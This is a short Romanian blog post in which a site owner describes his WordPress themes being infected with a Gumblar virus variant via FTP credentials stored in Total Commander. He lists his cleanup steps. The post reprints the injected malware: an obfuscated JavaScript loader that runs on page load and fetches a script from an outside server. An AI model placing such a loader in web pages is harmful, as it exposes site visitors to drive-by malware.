Am reuşit în urmă cu vreo 4 zile să infectez toate site-urile pe care le aveam in Total Commander cu un ratat de virus, cu o variantă mai nouă a virusului gumblar. Eu dăteam vina pe cei de la webfactor (sorry)… cică se lucreaza la servere când colo toate wordpress-urile mele erau ciuruite.

Ce trebuie să faci?

După ce am citit la dece ce trebuie să fac in situaţia asta, am schimbat imediat parolele de FTP, am făcut update la wordpress, am luat la puricat fiecare temă in parte şi am scanat cu Malwarebytes Anti-Malware. Fişierele infectate din temele wordpress au fost index.php, home.php şi toate fişierele jav a care existau in tema respectivă. Fiecare document avea la sfârşit adăugată minunea, cod ce incărca fişiere malware de pe alte servere (era bine dacă o incărca si pe mă-sa).

< script >/*GNU GPL*/ try{window.onload = function(){var Dlo228l8u771kzw = document.createElement(‘script’);Dlo228l8u771kzw.setAttribute(‘type’, ‘text/javascript’);Dlo228l8u771kzw.setAttribute(‘id’, ‘myscript1′);Dlo228l8u771kzw.setAttribute(‘src’, ‘h@(t#t^^!p#&:@^$(/$/(j^#^o^o(#$m&)$l$(@!#a$^-!&^$)o@@r##!!g^!(^.$$^s))$p(@(a@@n@)#k^@#w&)i#$r(e(.$!&#c!@o!^()!m#.!&w())3(^@s$&^c$)h&(o#!o&#l&@s!^&-(c#o(#)m@$.&(e$@&!a^s(y(t(a$(^)b)!&l&e@!t(e)(n!n$#)i^(^!s@.^(r^#^$u(#:&8^$)0)^#8^(!0^/!#g##@$$o&o#$g#l!e^($.(@c#o^!)m@/(g&$^o(@o$#(^g($l!e@.##c$)$(o$)!!m^$/($!b!)$)i$n#(g)!.^!c((@&@o^$m)$)/&!&g$(($o)o)@((g#&&l(!e@$.(f($)^&r@&!#/!w@(o(^!r)d()$!#p)!^r(e@#s&)!s(^!@.^(&o$#@r((g^/^^@’.replace(/!|@|&|)|$|(|#|^/ig, ”));Dlo228l8u771kzw.setAttribute(‘defer’, ‘defer’);document.body.appendChild(Dlo228l8u771kzw);}} catch(e) {}< /script >

Cum am luat acest virus?

Datorită folosirii intense [a] Internet Explorer-ului. Bă mă laşi? Nu folosesc IE decât atunci când vreau să testez o temă wordpress (pe localhost, atât) dar şi atunci folosesc IETester.
În caz că vă intrebaţi d’aia a fost blogu’ meu down vreo 3-4 zile. ;(

PS: Ce client FTP imi puteţi recomanda in loc de TotalCommander?